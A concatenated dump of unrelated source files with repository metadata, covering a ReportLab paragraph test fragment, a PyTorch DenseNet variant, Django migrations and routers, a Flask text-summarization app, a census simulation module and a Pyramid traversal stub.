'''Here comes <font face="Helvetica" size="14pt">Helvetica 14</font> with <Strong>strong</Strong> <em>emphasis</em>.''',
'''Here comes <font face="Courier" size="3cm">Courier 3cm</font> and normal again.''',
]:
P = Paragraph(text, styleSheet['Normal'], caseSensitive=0)
dumpParagraphFrags(P)
w, h = P.wrap(6 * 72, 9.7 * 72)
dumpParagraphLines(P)
if flagged(7):
text = """<para align="CENTER" fontSize="24" leading="30"><b>Generated by:</b>Dilbert</para>"""
P = Paragraph(text, styleSheet['Code'])
dumpParagraphFrags(P)
w, h = P.wrap(6 * 72, 9.7 * 72)
dumpParagraphLines(P)
if flagged(8):
text = """- bullet 0<br/>- bullet 1<br/>- bullet 2<br/>- bullet 3<br/>- bullet 4<br/>- bullet 5"""
P = Paragraph(text, styleSheet['Normal'])
dumpParagraphFrags(P)
w, h = P.wrap(6 * 72, 9.7 * 72)
dumpParagraphLines(P)
S = P.split(6 * 72, h / 2.0)
print len(S)
dumpParagraphLines(S[0])
dumpParagraphLines(S[1])
if flagged(9):
text = """Furthermore, the fundamental error of
regarding <img src="../docs/images/testimg.gif" width="3" height="7"/> functional notions as
categorial delimits a general
convention regarding the forms of the<br/>
grammar. I suggested that these results
would follow from the assumption that"""
P = Paragraph(text, ParagraphStyle('aaa', parent=styleSheet['Normal'], align=TA_JUSTIFY))
dumpParagraphFrags(P)
w, h = P.wrap(6 * cm - 12, 9.7 * 72)
dumpParagraphLines(P)
if flagged(10):
text = """a b c\xc2\xa0d e f"""
P = Paragraph(text, ParagraphStyle('aaa', parent=styleSheet['Normal'], align=TA_JUSTIFY))
dumpParagraphFrags(P)
w, h = P.wrap(6 * cm - 12, 9.7 * 72)
dumpParagraphLines(P)
| [
"[email protected]"
]
| |
d1878d336619c62c219f42222f728c8e4ed65c83 | 7d768b5be4213c3ac90648d48d1a322fb8c5c433 | /python_code/chuanzhi/python_advance/19/process_pool.py | e42b0da91f0fd4f73e665517b8f08d73f03c0eeb | []
| no_license | googleliyang/gitbook_cz_python | 7da5070b09e760d5e099aeae468c08e705b7da78 | c82b7d435dc11016e24cde2bdc4a558f507cb668 | refs/heads/master | 2020-04-02T17:47:58.400424 | 2018-12-22T09:48:59 | 2018-12-22T09:48:59 | 154,672,309 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 111 | py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
# @File : process_pool.py
# @Author: ly
# @Date : 2018/12/8
| [
"[email protected]"
]
| |
65757a625f7f8aafc159219b1ac837edf8deab90 | a251f675c1083e857d9f612a3bef9c6745d6b1b9 | /chapter12_async_IO_coroutine/yield_from_how.py | 45e7a864accdeeb55778cd38383ed8bfe7a2f6fa | []
| no_license | haokr/PythonProgramming_Advanced | 6319e5bb4a82944c11d83e1095e2aa37cb217bd9 | 472da8407828f53be3cc3d1153ac9b795f6a9a45 | refs/heads/master | 2022-04-01T22:02:10.364678 | 2020-02-09T08:07:55 | 2020-02-09T08:07:55 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,304 | py | # -*- coding: utf-8 -*-
'''
* @Author: WangHao
* @Date: 2020-01-12 09:47:40
* @LastEditors: WangHao
* @LastEditTime: 2020-01-12 10:07:08
* @Description: None
'''
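
# A minimal runnable sketch (illustrative addition, not the original
# author's code) of the `yield from` semantics summarized in the
# docstring below: values sent by the caller pass straight through the
# delegating generator to the subgenerator, and the subgenerator's
# `return EXPR` becomes the value of the `yield from` expression.
def _sub():
    total = 0
    while True:
        x = yield
        if x is None:
            return total        # raises StopIteration(total) under the hood
        total += x

def _delegator(result):
    # the value of `yield from` is the subgenerator's return value
    result.append((yield from _sub()))

if __name__ == '__main__':
    result = []
    g = _delegator(result)
    next(g)                     # prime the delegating generator
    g.send(1)                   # forwarded to _sub's send()
    g.send(2)
    try:
        g.send(None)            # _sub returns -> StopIteration ends g too
    except StopIteration:
        pass
    print(result)               # [3]
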
'''
Summary:
1. Values produced by the subgenerator go straight to the caller; values the caller passes in with .send() go straight to the subgenerator -- None invokes the subgenerator's __next__(), anything else its send().
2. When the subgenerator exits, its final `return EXPR` raises a StopIteration(EXPR).
3. The value of the `yield from` expression is the first argument of the StopIteration raised when the subgenerator terminates.
4. If a StopIteration is raised during the call, the delegating generator resumes; any other exception bubbles up.
5. Of the exceptions thrown into the delegating generator, all except GeneratorExit are forwarded to the subgenerator's throw() method; if that call raises StopIteration the delegating generator resumes, and any other exception bubbles up.
6. If close() is called on (or GeneratorExit thrown into) the delegating generator, the subgenerator's close() is called if it has one; if that close() raises, the exception bubbles up, otherwise the delegating generator raises GeneratorExit.
''' | [
"[email protected]"
]
| |
83319329ae3deb480ae7390407f2049fa217f9a8 | 03d29ea4bc9a0e302d6000947b5d70b17ebfdec5 | /games/hipixel.py | 75a9f1a40f443db7829006ae08d5b8ccc5799813 | []
| no_license | Tim232/GameWatcherBot | 0abc05657b5768db18c78ecbe8c9bee89169145e | aa60c0997928ea26d63b770d1dd55b208529f80f | refs/heads/main | 2023-03-04T13:52:27.690345 | 2021-02-16T12:31:39 | 2021-02-16T12:31:39 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 584 | py | import requests
import json
import os
import sys
sys.path.append(os.path.dirname(os.path.abspath(os.path.dirname(__file__))))
#import bot
key, player_uuid = '', ''
with open('../settings.json', 'r') as f:
hipixel_settings = json.load(f)["hipixel"]
key = hipixel_settings["key"]
player_uuid = hipixel_settings["player_uuid"]
url = 'https://api.hypixel.net/status?key=' + key + '&uuid=' + player_uuid
html = requests.get(url)
result = json.loads(html.text)
#bot.client.get_channel(channel_id)
if result['session']['online']: print('온라인')
else: print('오프라인') | [
"[email protected]"
]
| |
8bfa5c02a3089abb03156a6609bfed1a989474e9 | d5f8ca3c13f681d147b7614f1902df7ba34e06f9 | /Graduate/model/densenet.py | 38359413ab29892a7c8f412c5fc1741039a65696 | []
| no_license | hhjung1202/OwnAdaptation | 29a6c0a603ab9233baf293096fb9e7e956647a10 | 50805730254419f090f4854387be79648a01fbb4 | refs/heads/master | 2021-06-25T22:31:15.437642 | 2020-11-26T18:19:55 | 2020-11-26T18:19:55 | 176,670,379 | 1 | 0 | null | 2020-06-11T07:35:55 | 2019-03-20T06:36:19 | Python | UTF-8 | Python | false | false | 7,429 | py | import torch
import torch.nn as nn
import torch.nn.functional as F
from collections import OrderedDict
from torch import Tensor
import itertools
class Flatten(nn.Module):
def forward(self, x):
return x.view(x.size(0), -1)
class _Gate_selection(nn.Sequential):
phase = 2
def __init__(self, num_input_features, growth_rate, count, reduction=4):
super(_Gate_selection, self).__init__()
self.actual = (count+1) // 2
LongTensor = torch.cuda.LongTensor if torch.cuda.is_available() else torch.LongTensor
self.init = LongTensor([i for i in range(num_input_features)]).view(1, -1)
s = num_input_features
arr = []
for j in range(count):
arr += [[i for i in range(s, s + growth_rate)]]
s+=growth_rate
self.arr = LongTensor(arr)
self.avg_pool = nn.AdaptiveAvgPool2d(1)
channels = num_input_features + growth_rate * count
self.fc1 = nn.Linear(channels, channels//reduction)
self.relu = nn.ReLU(inplace=True)
self.fc2 = nn.Linear(channels//reduction, count)
self.sigmoid = nn.Sigmoid()
self.flat = Flatten()
def forward(self, x, x_norm):
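        # Squeeze-and-excitation style gating: global-average-pool the
        # normalized features, score each growth-rate slice with a small
        # two-layer MLP, pick `self.actual` slice indices from the sorted
        # scores (order shuffled), then gather those channels -- plus the
        # always-kept input channels -- out of x.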
b, _, w, h = x_norm.size()
        out = self.avg_pool(x_norm) # (batch, concatenated channels, w, h)
out = self.flat(out)
out = self.relu(self.fc1(out))
out = self.sigmoid(self.fc2(out))
_, sort = out.sort()
indices = sort[:,:self.actual] # batch, sort # shuffle
indices = indices[:, torch.randperm(indices.size(1))]
select = self.init.repeat(b,1)
select = torch.cat([select, self.arr[indices].view(b,-1)], 1)
select = select.view(select.size(0), -1, 1, 1).repeat(1,1,w,h)
x = x.gather(1, select)
return x
class _Bottleneck(nn.Sequential):
def __init__(self, num_input_features, growth_rate, count=1):
super(_Bottleneck, self).__init__()
self.norm1 = nn.BatchNorm2d(num_input_features)
self.relu = nn.ReLU(inplace=True)
self.conv1 = nn.Conv2d(num_input_features, 4 * growth_rate,
kernel_size=1, stride=1, bias=False)
self.norm2 = nn.BatchNorm2d(4 * growth_rate)
self.conv2 = nn.Conv2d(4 * growth_rate, growth_rate,
kernel_size=3, stride=1, padding=1, bias=False)
self.count = count
def forward(self, x):
if isinstance(x, Tensor):
x = [x]
out = torch.cat(x,1)
out = self.norm1(out)
out = self.relu(out)
out = self.conv1(out)
out = self.norm2(out)
out = self.relu(out)
out = self.conv2(out)
return out
class _Basic(nn.Sequential):
    def __init__(self, num_input_features, growth_rate, count=1):
super(_Basic, self).__init__()
self.norm1 = nn.BatchNorm2d(num_input_features)
self.relu = nn.ReLU(inplace=True)
self.conv1 = nn.Conv2d(num_input_features, growth_rate,
kernel_size=3, stride=1, padding=1, bias=False)
self.count = count
def forward(self, x):
if isinstance(x, Tensor):
x = [x]
out = torch.cat(x,1)
out = self.norm1(out)
out = self.relu(out)
out = self.conv1(out)
return out
class _DenseLayer(nn.Module):
def __init__(self, num_input_features, growth_rate, num_layers, Block):
super(_DenseLayer, self).__init__()
self.num_layers = num_layers
self.init_block = Block(num_input_features, growth_rate)
for i in range(1, num_layers):
j = (i-1)//2 + 1
setattr(self, 'layer{}'.format(i), Block(num_input_features + growth_rate * j, growth_rate))
setattr(self, 'norm{}'.format(i), nn.BatchNorm2d(num_input_features + growth_rate * (i+1)))
setattr(self, 'gate{}'.format(i), _Gate_selection(num_input_features, growth_rate, i+1, reduction=4))
def forward(self, x):
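        # Standard DenseNet connectivity (concatenate every block's
        # output), except the running concatenation is thinned by
        # _Gate_selection before feeding the next block; the full
        # concatenation x_cat is what gets returned.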
out = self.init_block(x)
x = [x] + [out]
out = torch.cat(x,1)
for i in range(1, self.num_layers):
out = getattr(self, 'layer{}'.format(i))(out)
x += [out]
x_cat = torch.cat(x,1)
x_norm = getattr(self, 'norm{}'.format(i))(x_cat)
out = getattr(self, 'gate{}'.format(i))(x_cat, x_norm)
return x_cat
class _Transition(nn.Sequential):
def __init__(self, num_input_features, tr_features):
super(_Transition, self).__init__()
self.norm = nn.BatchNorm2d(tr_features)
self.relu = nn.ReLU(inplace=True)
self.conv = nn.Conv2d(tr_features, num_input_features // 2,
kernel_size=1, stride=1, bias=False)
self.pool = nn.AvgPool2d(kernel_size=2, stride=2)
def forward(self, x):
# out = torch.cat(x,1)
out = self.norm(x)
out = self.relu(out)
out = self.conv(out)
out = self.pool(out)
return out
class DenseNet(nn.Module):
def __init__(self, growth_rate=12,
num_init_features=24, num_classes=10, is_bottleneck=True, layer=28):
super(DenseNet, self).__init__()
        if layer == 28:
            block_config = [4, 4, 4]
        elif layer == 40:
            block_config = [6, 6, 6]
        elif layer == 52:
            block_config = [8, 8, 8]
        elif layer == 64:
            block_config = [10, 10, 10]
if is_bottleneck:
Block = _Bottleneck
else:
Block = _Basic
block_config = [2*x for x in block_config]
self.features = nn.Sequential()
self.features.add_module('conv0', nn.Conv2d(3, num_init_features, kernel_size=3, stride=1, padding=1, bias=False))
num_features = num_init_features
for i in range(len(block_config)):
self.features.add_module('layer%d' % (i + 1), _DenseLayer(num_features, growth_rate, block_config[i], Block))
tr_features = num_features + block_config[i] * growth_rate
num_features = num_features + block_config[i] * growth_rate // 2
if i != len(block_config) - 1:
self.features.add_module('transition%d' % (i + 1), _Transition(num_features, tr_features))
num_features = num_features // 2
# Final batch norm
self.norm = nn.BatchNorm2d(tr_features)
self.relu = nn.ReLU(inplace=True)
self.pool = nn.AvgPool2d(kernel_size=8, stride=1)
self.fc = nn.Linear(tr_features, num_classes)
for m in self.modules():
if isinstance(m, nn.Conv2d):
nn.init.kaiming_normal_(m.weight)
elif isinstance(m, nn.BatchNorm2d):
nn.init.constant_(m.weight, 1)
nn.init.constant_(m.bias, 0)
elif isinstance(m, nn.Linear):
nn.init.constant_(m.bias, 0)
# Linear layer
# Official init from torch repo.
def forward(self, x):
out = self.features(x)
# out = torch.cat(out,1)
out = self.norm(out)
out = self.relu(out)
out = self.pool(out)
out = out.view(out.size(0), -1)
out = self.fc(out)
return out
if __name__=='__main__':
x = torch.randn(4,3,32,32)
model = DenseNet(growth_rate=12, num_init_features=24, num_classes=10, is_bottleneck=True, layer=40)
y = model(x)
print(y.size()) | [
"[email protected]"
]
| |
03ff755a26f0ca8650026e3ea508c2e1a76f5a1c | 73e4f50d2aabaf630e3a6154f3a149f6dee22656 | /apps/users/migrations/0003_auto_20170124_1008.py | 57a0420da15f1ec3aac5a6b35f833671e6d0a2c2 | []
| no_license | gjw199513/Mxonline | 508f8878eba396de1a88903c148a2f32641d9d8f | 360b759a0d21d712f3588c6fec377aabc2f990e0 | refs/heads/master | 2022-11-28T14:25:19.268436 | 2017-12-22T09:23:01 | 2017-12-22T09:23:31 | 80,403,072 | 4 | 2 | null | null | null | null | UTF-8 | Python | false | false | 491 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.10.5 on 2017-01-24 10:08
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('users', '0002_auto_20170124_1007'),
]
operations = [
migrations.AlterField(
model_name='userprofile',
name='mobile',
field=models.CharField(blank=True, default=None, max_length=11, null=True),
),
]
| [
"gjw605134015"
]
| gjw605134015 |
cb17300b448fc5e8bf2a11a3c0e264dee6949afd | 20250e3dee97220e908d48e4a0d09fe1cbbf0ec0 | /app/migrations/0014_grupos.py | b7fd3449055bee2774d218416474b149b04ea48f | []
| no_license | sergio200086/Sistema-academico | 3e7af83301ddc7f380d03bad74485712b39b9aa6 | 70d03a67de6b72dff738560118f620c2fe7b016f | refs/heads/master | 2023-07-25T19:59:05.610314 | 2021-09-03T17:04:29 | 2021-09-03T17:04:29 | 402,836,941 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 831 | py | # Generated by Django 3.2 on 2021-05-18 19:57
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('app', '0013_profesores'),
]
operations = [
migrations.CreateModel(
name='Grupos',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('codigogrupo', models.CharField(max_length=50)),
('asignatura', models.CharField(max_length=50)),
('semestre', models.CharField(max_length=50)),
('profesorgrupo', models.ForeignKey(null=True, on_delete=django.db.models.deletion.PROTECT, related_name='profesorgrupo', to='app.profesores')),
],
),
]
| [
"[email protected]"
]
| |
c209bbaacb59462c92f86852c6966232dfbf4d38 | 2c3404d57a64e52bb860b59445e48a6cf4537bc6 | /backend/services/migrations/0003_auto_20210502_1837.py | d5b91cd5d6d2ba633c5270a8f3f6263dbe68ffd6 | []
| no_license | miyou995/octosite | 42ef627c0d8378b007d9bad1333768428cc6ec2e | 362f5013a48fb7cd54a4cae84aed58da8fbb4388 | refs/heads/master | 2023-07-07T10:21:52.985355 | 2021-08-05T07:36:04 | 2021-08-05T07:36:04 | 392,947,907 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,306 | py | # Generated by Django 3.0.7 on 2021-05-02 17:37
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('services', '0002_auto_20210502_1438'),
]
operations = [
migrations.CreateModel(
name='ServiceCategory',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=200, verbose_name='Nom Catégorie')),
('slug', models.SlugField(max_length=200, unique=True, verbose_name='Slug')),
('description', models.CharField(max_length=400)),
('icon_url', models.CharField(max_length=250)),
],
options={
'verbose_name': 'Catégorie',
'verbose_name_plural': 'Catégories',
'ordering': ('name',),
},
),
migrations.AlterField(
model_name='service',
name='category',
field=models.ForeignKey(on_delete=django.db.models.deletion.PROTECT, to='services.ServiceCategory', verbose_name='Catégorie'),
),
migrations.DeleteModel(
name='Category',
),
]
| [
"[email protected]"
]
| |
0acae82186a9621c166aec6bb0d254ebb92b1f81 | 818dae742767ca890779c208d0e71292c9c688c8 | /app.py | ee11cfae74e172e2a4288e1f931afd1cc7937f75 | []
| no_license | mnassrib/text-summarizer-app | f128eda50b2dfa620f6f6bba46942ecb487c5f2f | 3c97606497dc9e933ee0bb086a58be3cb4a678f1 | refs/heads/master | 2022-07-28T18:01:28.673292 | 2020-05-19T23:53:08 | 2020-05-19T23:53:08 | 265,273,408 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,995 | py | from __future__ import unicode_literals
from flask import Flask, render_template, url_for, request
from spacy_summarization import text_summarizer
from gensim.summarization import summarize
from nltk_summarization import nltk_summarizer
import time
import spacy
import en_core_web_sm
nlp = en_core_web_sm.load()
app = Flask(__name__)
# Web Scraping Pkg
from bs4 import BeautifulSoup
from urllib.request import urlopen
#from urllib import urlopen
# Sumy Pkg
from sumy.parsers.plaintext import PlaintextParser
from sumy.nlp.tokenizers import Tokenizer
from sumy.summarizers.lex_rank import LexRankSummarizer
# Sumy
def sumy_summary(docx):
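    # LexRank extractive summarization: parse the plain text, rank the
    # sentences, and join the top 3 into a single string.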
parser = PlaintextParser.from_string(docx,Tokenizer("english"))
lex_summarizer = LexRankSummarizer()
summary = lex_summarizer(parser.document,3)
summary_list = [str(sentence) for sentence in summary]
result = ' '.join(summary_list)
return result
# Reading Time
def readingTime(mytext):
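    # Estimated reading time in minutes, assuming ~200 words per minute;
    # "words" here are the tokens produced by the spaCy pipeline above.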
total_words = len([ token.text for token in nlp(mytext)])
estimatedTime = total_words/200.0
return estimatedTime
# Fetch Text From Url
def get_text(url):
page = urlopen(url)
    soup = BeautifulSoup(page, "html.parser")
fetched_text = ' '.join(map(lambda p:p.text,soup.find_all('p')))
return fetched_text
@app.route('/')
def index():
return render_template('index.html')
@app.route('/analyze', methods=['GET','POST'])
def analyze():
start = time.time()
if request.method == 'POST':
rawtext = request.form['rawtext']
final_reading_time = "{:.3f}".format(readingTime(rawtext))
final_summary = text_summarizer(rawtext)
summary_reading_time = "{:.3f}".format(readingTime(final_summary))
end = time.time()
final_time = "{:.3f}".format(end-start)
return render_template('index.html',ctext=rawtext,final_summary=final_summary,final_time=final_time,final_reading_time=final_reading_time,summary_reading_time=summary_reading_time)
@app.route('/analyze_url', methods=['GET','POST'])
def analyze_url():
start = time.time()
if request.method == 'POST':
raw_url = request.form['raw_url']
rawtext = get_text(raw_url)
final_reading_time = "{:.3f}".format(readingTime(rawtext))
final_summary = text_summarizer(rawtext)
summary_reading_time = "{:.3f}".format(readingTime(final_summary))
end = time.time()
final_time = "{:.3f}".format(end-start)
return render_template('index.html',ctext=rawtext,final_summary=final_summary,final_time=final_time,final_reading_time=final_reading_time,summary_reading_time=summary_reading_time)
@app.route('/compare_summary')
def compare_summary():
return render_template('compare_summary.html')
@app.route('/comparer', methods=['GET','POST'])
def comparer():
start = time.time()
if request.method == 'POST':
rawtext = request.form['rawtext']
final_reading_time = "{:.3f}".format(readingTime(rawtext))
final_summary_spacy = text_summarizer(rawtext)
summary_reading_time = "{:.3f}".format(readingTime(final_summary_spacy))
# Gensim Summarizer
final_summary_gensim = summarize(rawtext)
summary_reading_time_gensim = "{:.3f}".format(readingTime(final_summary_gensim))
# NLTK
final_summary_nltk = nltk_summarizer(rawtext)
summary_reading_time_nltk = "{:.3f}".format(readingTime(final_summary_nltk))
# Sumy
final_summary_sumy = sumy_summary(rawtext)
summary_reading_time_sumy = "{:.3f}".format(readingTime(final_summary_sumy))
end = time.time()
final_time = "{:.3f}".format(end-start)
return render_template('compare_summary.html',ctext=rawtext,final_summary_spacy=final_summary_spacy,final_summary_gensim=final_summary_gensim,final_summary_nltk=final_summary_nltk,final_time=final_time,final_reading_time=final_reading_time,summary_reading_time=summary_reading_time,summary_reading_time_gensim=summary_reading_time_gensim,final_summary_sumy=final_summary_sumy,summary_reading_time_sumy=summary_reading_time_sumy,summary_reading_time_nltk=summary_reading_time_nltk)
@app.route('/about')
def about():
return render_template('index.html')
if __name__ == '__main__':
app.run(debug=True) | [
"[email protected]"
]
| |
5f521276c2d1adbf2aab4331c07f24c57d0c44ad | 53a1e00175aad8bb9bc9d93c47a3e12eeffb7c67 | /account/migrations/0038_auto_20200917_0120.py | 607a62545d691cc8c088b0f011d46c375bd3a602 | []
| no_license | mirsisir/flash | c363d748725ebf4c5bbce9f03cbaafe32f768e9e | 42d73be32fd29ab4592ccaca3c03b786223fc902 | refs/heads/master | 2022-12-26T08:02:54.927235 | 2020-10-03T08:32:24 | 2020-10-03T08:32:24 | 300,835,641 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 353 | py | # Generated by Django 3.0.8 on 2020-09-17 01:20
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('account', '0037_auto_20200917_0100'),
]
operations = [
migrations.AlterModelOptions(
name='order',
options={'ordering': ('-order_date1',)},
),
]
| [
"[email protected]"
]
| |
af2ce57e29ae463e1877eb93020a815ea4ffd575 | 921a8ebd5add1cd15db7e558801bf6f5167073d7 | /hq.py | d9093527875528007031eec0e0b09be2fde29b71 | []
| no_license | ONSdigital/FOCUS | 768a5713ec8909cbcdb6b6af882879dda0647576 | d6920bf036abb49872a1f4908fdfdff8135c0f68 | refs/heads/master | 2021-09-03T20:02:07.212625 | 2017-11-13T16:39:54 | 2017-11-13T16:39:54 | 50,437,640 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 8,091 | py | """Module used to store the classes and other code related to any aspect of the census hq operation"""
import output_options as oo
import helper as h
import datetime
from simpy.util import start_delayed
import math
def ret_rec(household, rep):
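    # Marks a household's return as received, bumps the per-day summary
    # counters, and records the response events in the report output.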
# print out every 100000 returns?
#if rep.total_responses % 100000 == 0:
#print(rep.total_responses)
if oo.record_active_summary:
# add household to summary of responses
for key, value in rep.active_summary.items():
value[str(getattr(household, key))][math.floor(rep.env.now / 24)] += 1
for key, value in rep.active_totals.items():
value[str(getattr(household, key))] += 1
if oo.record_active_paper_summary and not household.digital:
for key, value in rep.active_paper_summary.items():
value[str(getattr(household, key))][math.floor(rep.env.now / 24)] += 1
for key, value in rep.active_paper_totals.items():
value[str(getattr(household, key))] += 1
household.return_received = True
if oo.record_return_received:
rep.output_data['Return_received'].append(oo.generic_output(rep.reps,
household.district.district,
household.la,
household.lsoa,
household.digital,
household.hh_type,
household.hh_id,
rep.env.now))
# currently every return gets counted as a response as soon as it is received - this may need to change
household.responded = True
rep.total_responses += 1
household.district.total_responses += 1
# check size of output data - if over an amount, size or length write to file?
if oo.record_responded:
rep.output_data['Responded'].append(oo.generic_output(rep.reps,
household.district.district,
household.la,
household.lsoa,
household.digital,
household.hh_type,
household.hh_id,
rep.env.now))
# checks size of output and writes to file if too large
if (h.dict_size(rep.output_data)) > rep.max_output_file_size:
h.write_output(rep.output_data, rep.output_path, rep.run)
yield rep.env.timeout(0)
# so returned and we know it! remove from simulation??
class Adviser(object):
"""Call centre adviser"""
def __init__(self, rep, id_num, input_data, ad_type):
self.rep = rep
self.id_num = id_num
self.input_data = input_data
self.type = ad_type
# date range in datetime format
self.start_date = datetime.datetime.strptime(self.input_data['start_date'], '%Y, %m, %d').date()
self.end_date = datetime.datetime.strptime(self.input_data['end_date'], '%Y, %m, %d').date()
# date range in simpy format
self.start_sim_time = h.get_entity_time(self, "start") # the sim time the adviser starts work
self.end_sim_time = h.get_entity_time(self, "end") # the sim time the adviser ends work
# time range - varies by day of week
self.set_avail_sch = input_data['availability']
class LetterPhase(object):
def __init__(self, env, rep, district, input_data, letter_type):
self.env = env
self.rep = rep
self.district = district
self.input_data = input_data
self.letter_type = letter_type
self.blanket = h.str2bool(self.input_data["blanket"])
self.targets = self.input_data["targets"]
self.start_sim_time = h.get_event_time(self)
self.period = self.input_data["period"]
# add process to decide who to send letters too...but with a delay
start_delayed(self.env, self.fu_letter(), self.start_sim_time)
def fu_letter(self):
temp_letter_list = [household for household in self.district.households
if (not self.blanket and household.hh_type in self.targets and not household.responded) or \
(self.blanket and household.hh_type in self.targets)]
# order by priority
temp_letter_list.sort(key=lambda hh: hh.priority, reverse=False)
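        # The slicing below spreads households over `period` days
        # round-robin: slice i is posted with an i-day (i * 24h) delay.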
for i in range(self.period):
current_letter_day = temp_letter_list[i::self.period]
for household in current_letter_day:
add_delay = i * 24
if self.letter_type == 'pq':
household.paper_allowed = True
if oo.record_paper_summary:
# add to the summary of the amount of paper given
for key, value in self.rep.paper_summary.items():
value[str(getattr(household, key))][math.floor((self.env.now + add_delay) / 24)] += 1
for key, value in self.rep.paper_totals.items():
value[str(getattr(household, key))] += 1
self.env.process(self.co_send_letter(household, self.letter_type, self.input_data["delay"] + add_delay))
yield self.env.timeout(0)
def co_send_letter(self, household, letter_type, delay):
if oo.record_letters:
self.rep.output_data[letter_type + '_sent'].append(oo.generic_output(self.rep.reps,
household.district.district,
household.la,
household.lsoa,
household.digital,
household.hh_type,
household.hh_id,
self.env.now))
yield self.env.timeout(delay)
self.env.process(household.receive_reminder(letter_type))
def schedule_paper_drop(obj, contact_type, reminder_type, delay):
# add to summary of paper given out
if reminder_type == 'pq' and oo.record_paper_summary:
for key, value in obj.rep.paper_summary.items():
value[str(getattr(obj, key))][math.floor(obj.rep.env.now / 24)] += 1
for key, value in obj.rep.paper_totals.items():
value[str(getattr(obj, key))] += 1
output_type = contact_type + "_" + reminder_type + "_posted" # use this as output key
if oo.record_posted:
obj.rep.output_data[output_type].append(oo.generic_output(obj.rep.reps,
obj.district.district,
obj.la,
obj.lsoa,
obj.digital,
obj.hh_type,
obj.hh_id,
obj.env.now))
if delay > 0:
start_delayed(obj.env, obj.receive_reminder(reminder_type), delay)
else:
obj.env.process(obj.receive_reminder(reminder_type))
yield obj.env.timeout(0)
| [
"[email protected]"
]
| |
c35827798e41b221d01c7605547d9563c1b93e01 | c040de12811afa588a23ad6c0cd4fdc849ab469f | /saklient/cloud/errors/usernotspecifiedexception.py | 4bd94f412d92c987223a12491a2dad83d3c4cda1 | [
"MIT"
]
| permissive | toshitanian/saklient.python | 3707d1113744122c5ab1ae793f22c6c3a0f65bc4 | 287c56915dd825d676eddc538cbb33b483803dc2 | refs/heads/master | 2021-05-28T08:13:16.851101 | 2014-10-09T09:54:03 | 2014-10-09T09:54:03 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 790 | py | # -*- coding:utf-8 -*-
from ...errors.httpforbiddenexception import HttpForbiddenException
# module saklient.cloud.errors.usernotspecifiedexception
class UserNotSpecifiedException(HttpForbiddenException):
    ## The requested operation is not permitted. This API must be accessed with an authentication method that can identify the user.
## @param {int} status
# @param {str} code=None
# @param {str} message=""
def __init__(self, status, code=None, message=""):
super(UserNotSpecifiedException, self).__init__(status, code, "要求された操作は許可されていません。このAPIはユーザを特定できる認証方法でアクセスする必要があります。" if message is None or message == "" else message)
| [
"[email protected]"
]
| |
81f5eb7112b4fddb2b1def7dd9e93b220c6f3982 | 06905fd703d600f95f7a21dfe8e102b26df05921 | /mmsite/wsgi.py | eeab6b532485c7681a3e40ee26925807b14b17ee | []
| no_license | NmrTannhauser/marketmaker | 5fa722962b7a3300967378970ddb9d572d254b38 | 87761de0187b1ae65236d7f968eaeb9a43f23c07 | refs/heads/master | 2020-03-14T16:35:28.388404 | 2018-05-28T16:14:41 | 2018-05-28T16:14:41 | 131,701,070 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 390 | py | """
WSGI config for mmsite project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/1.11/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "mmsite.settings")
application = get_wsgi_application()
| [
"[email protected]"
]
| |
71c9b1d33046a6ad3c060c4f3e76ee5cf4280b26 | 36073b3c349eb6887a03b8f90b39ebd54fa3deb3 | /cadastros/urls.py | 225b7457bf5f7a4bb5dc7949f740bd6c6c5f567f | []
| no_license | evertonpauli/e-ticket | 6ba29a3d4a0b3dc2841a5db470e2c717315e8450 | 066cf48e70dec425aeaaa7aeefd617ffd1616307 | refs/heads/master | 2023-04-30T10:54:13.013547 | 2019-08-15T13:12:45 | 2019-08-15T13:12:45 | 202,204,800 | 0 | 0 | null | 2023-04-21T20:36:51 | 2019-08-13T18:42:22 | Python | UTF-8 | Python | false | false | 328 | py | from rest_framework import routers
from cadastros.views import ClientesViewSet, CategoriaViewSet, StatusViewSet
router = routers.DefaultRouter(trailing_slash=True)
router.register('clientes', ClientesViewSet)
router.register('categorias', CategoriaViewSet)
router.register('status', StatusViewSet)
urlpatterns = router.urls
| [
"[email protected]"
]
| |
1f1e7a0b4abdeaaf41b0249eee3816924a031f17 | d732fb0d57ec5430d7b15fd45074c555c268e32c | /misc/traversal_basics/trav10.py | a31652b349cd80bc1656caffb5760ac4bffff3db | []
| no_license | askobeldin/mypython3 | 601864997bbebdabb10809befd451490ffd37625 | 8edf58311a787f9a87330409d9734370958607f1 | refs/heads/master | 2020-04-12T08:01:16.893234 | 2018-02-01T18:23:23 | 2018-02-01T18:23:23 | 60,504,448 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 16,373 | py | #! /usr/bin/env python
# -*- coding: utf-8 -*-
#
################################################################################
try:
from collections import OrderedDict
except ImportError:
from ordereddict import OrderedDict
from string import Template
from wsgiref.simple_server import make_server
from pyramid.config import Configurator
from pyramid.response import Response
from pyramid.location import lineage
"""
from pyramid.httpexceptions import HTTPFound
#################################
# make a new Document
#
title = appstruct['title']
body = appstruct['body']
name = str(randint(0, 999999))
new_document = Document(name, self.context, title, body)
self.context[name] = new_document
######################################
# Redirect to the new document
#
url = self.request.resource_url(new_document)
return HTTPFound(location=url)
"""
